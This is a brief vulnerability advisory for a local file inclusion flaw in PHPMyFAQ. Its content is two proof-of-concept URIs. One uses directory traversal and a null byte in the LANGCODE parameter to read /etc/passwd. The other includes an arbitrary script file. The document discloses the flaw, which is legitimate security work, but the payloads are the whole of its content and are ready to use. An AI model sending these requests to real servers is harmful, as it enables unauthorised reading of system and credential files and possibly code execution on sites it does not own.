PHPMyFAQ Local File Include Vulnerability

PHPMyFAQ Local File Include Vulnerability

No exploit is required.

The following proof of concept URI are available:
http://www.example.com/[path]/phpmyfaq/index.php?LANGCODE=/../../../../../../etc/passwd%00
http://www.example.com/[path]/phpmyfaq/index.php?LANGCODE=/../../../../[scriptname]